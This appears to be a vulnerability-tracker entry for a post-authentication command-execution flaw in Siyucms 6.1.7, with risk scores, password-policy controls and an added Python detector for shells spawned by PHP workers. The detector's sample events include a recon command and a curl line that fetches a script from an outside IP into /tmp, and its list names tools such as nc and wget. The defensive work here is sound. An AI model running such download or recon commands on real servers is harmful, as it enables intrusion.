Cyber Resilience

CVE-2022-43030

Severity: High · Public PoC

Published: 14 November 2022
Modified: 01 May 2025
KEV Added: not listed
Patch: no vendor patch referenced in the available sources
CVSS Score: 7.2 (v3.1), vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS Score: 0.0236 (85.3rd percentile)
Risk Priority: 16 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2022-43030 is a high-severity vulnerability in Siyucms (vendor Siyucms). The NVD entry classifies it as Weak Password Requirements (CWE-521), although the vulnerability description itself concerns command execution in the administrative background (see Deeper analysis below). Its CVSS v3.1 base score is 7.2 (High).

Operationally, it ranks in the top 14.7% of CVEs by EPSS exploit likelihood (85.3rd percentile); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

Siyucms version 6.1.7 contains a remote code execution vulnerability in its administrative background interface. The affected software is SIYUCMS, a content management system built on ThinkPHP5 and AdminLTE, where the flaw permits execution of arbitrary commands through the management console.

An attacker who holds valid administrative credentials can reach the vulnerable background functions over the network and run operating-system commands in the context of the web-server process, resulting in full server compromise and a path to further privilege escalation. The CVSS 7.2 rating (AV:N/AC:L/PR:H/UI:N) reflects that the flaw is reachable over the network with no user interaction, but that high (administrative) privileges are required first; the privilege requirement is what keeps the score below the 9.8 an unauthenticated flaw with the same impact would receive.

Public references consist of GitHub repositories that document the issue; no vendor advisory or official patch information is provided in the available sources. The associated EPSS score rose from a low baseline to a peak of 0.0504 in January 2025 before receding to its current value of 0.0236. EPSS estimates the probability of exploitation in the wild over the following 30 days, so this movement indicates increased predicted exploitation likelihood after disclosure, not confirmed exploitation.
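Because the flaw is post-authentication command execution, a defender who cannot patch it still has a reliable host-side signal: the PHP worker serving the CMS should not be spawning shells. The detector below is an added example (not code from the tracker page or from Siyucms) that scans process-creation events and flags any shell or common reconnaissance utility whose parent is a PHP process. The JSON field names, the sample events and the host and IP values are all constructed for this example and do not correspond to a real product's schema or a real incident.

```python
"""Process-lineage detector for web-worker command execution (added example).

Keys on parent/child lineage rather than on command-line strings: the command
body is attacker-controlled and trivially obfuscated, the parent process is not.
"""
import json
import os
import re
from typing import List, Optional

SHELLS = {"sh", "bash", "dash", "zsh"}
RECON = {"id", "whoami", "uname", "cat", "curl", "wget", "nc", "python3", "perl"}

# Constructed sample events (assumed schema): a legitimate PHP child doing an
# image resize, a benign cron shell, then a shell and a download spawned by
# php-fpm, which is what exploitation of a background command-execution flaw
# looks like from the host's point of view.
SAMPLE_EVENTS = """\
{"ts":"2025-05-01T10:00:01Z","host":"web01","pid":4101,"ppid":1200,"user":"www-data","parent_image":"/usr/sbin/php-fpm8.1","image":"/usr/bin/convert","cmdline":"convert upload.png -resize 200x200 thumb.png"}
{"ts":"2025-05-01T10:00:05Z","host":"web01","pid":4102,"ppid":1,"user":"root","parent_image":"/usr/sbin/cron","image":"/bin/sh","cmdline":"/bin/sh -c /etc/cron.hourly/logrotate"}
{"ts":"2025-05-01T10:01:13Z","host":"web01","pid":4103,"ppid":1200,"user":"www-data","parent_image":"/usr/sbin/php-fpm8.1","image":"/bin/sh","cmdline":"sh -c id;uname -a"}
{"ts":"2025-05-01T10:01:14Z","host":"web01","pid":4104,"ppid":1200,"user":"www-data","parent_image":"/usr/sbin/php-fpm8.1","image":"/usr/bin/curl","cmdline":"curl -s http://198.51.100.7/x.sh -o /tmp/x.sh"}
"""


def is_php_worker(image: str) -> bool:
    """True for php, php-fpm, php-cgi and versioned variants such as php-fpm8.1."""
    base = os.path.basename(image)
    return re.fullmatch(r"php(?:-fpm|-cgi)?[\d.]*", base) is not None


def classify(event: dict) -> Optional[str]:
    """Finding label for one process-creation event, or None if benign."""
    if not is_php_worker(event.get("parent_image", "")):
        return None
    child = os.path.basename(event.get("image", ""))
    if child in SHELLS:
        return "php_worker_spawned_shell"
    if child in RECON:
        return "php_worker_spawned_recon_tool"
    return None


def scan(lines: str) -> List[dict]:
    """Scan JSON-lines process events; malformed lines are skipped, not fatal."""
    findings = []
    for raw in lines.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue
        label = classify(event)
        if label:
            findings.append({
                "label": label,
                "ts": event.get("ts"),
                "pid": event.get("pid"),
                "user": event.get("user"),
                "cmdline": event.get("cmdline", ""),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['ts']} pid={f['pid']} user={f['user']} {f['label']}: {f['cmdline']}")
```

On the sample the cron-launched `/bin/sh` and the image-resize child are ignored and only the two php-fpm children (pids 4103 and 4104) are reported. If the CMS legitimately shells out (for example to ImageMagick), add those specific child images to an allow-list rather than widening the parent match; a shell child of a PHP worker is worth a ticket even when it turns out to be a plugin.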

Vulnerability details

Siyucms v6.1.7 was discovered to contain a remote code execution (RCE) vulnerability in the background. SIYUCMS is a content management system based on ThinkPHP5 and AdminLTE. SIYUCMS has a background command execution vulnerability, which can be used by attackers to gain server privileges.

CWE(s)

CWE-521: Weak Password Requirements (as cited in the NVD entry)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

Vendor: siyucms
Product: siyucms
Version: 6.1.7

Mitigating Controls

Likely Mitigating Controls (AI-generated mapping)

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry. Note that CWE-521 (weak password requirements) describes the cited weakness class, not the command-execution behaviour in the vulnerability details above. These controls therefore reduce the chance that an attacker obtains the administrative credentials the flaw requires; they do not remove the flaw itself. Restricting network exposure of the administrative console and monitoring the PHP worker process for spawned shells are the complementary controls a defender would add while no vendor fix is referenced.

Each control below addresses CWE-521.

Configuration settings can define and enforce strong password requirements to avoid weak policies.

Identification and authentication (IA) policy establishes password requirements, directly addressing weak password requirements.

Ensuring authenticators have sufficient strength of mechanism for their intended use addresses weak password requirements.

Organization-wide password and authentication policies are applied uniformly, preventing weak local password requirements.

Facilitated training and awareness of current practices improves definition and enforcement of sufficiently strong password requirements.

Dedicated security resources support deployment of strong authentication systems and enforcement of robust password policies.

Vulnerability scans assess password policies and weak credential requirements against benchmarks.

User documentation on maintaining security includes password requirements, directly mitigating weak password policies.
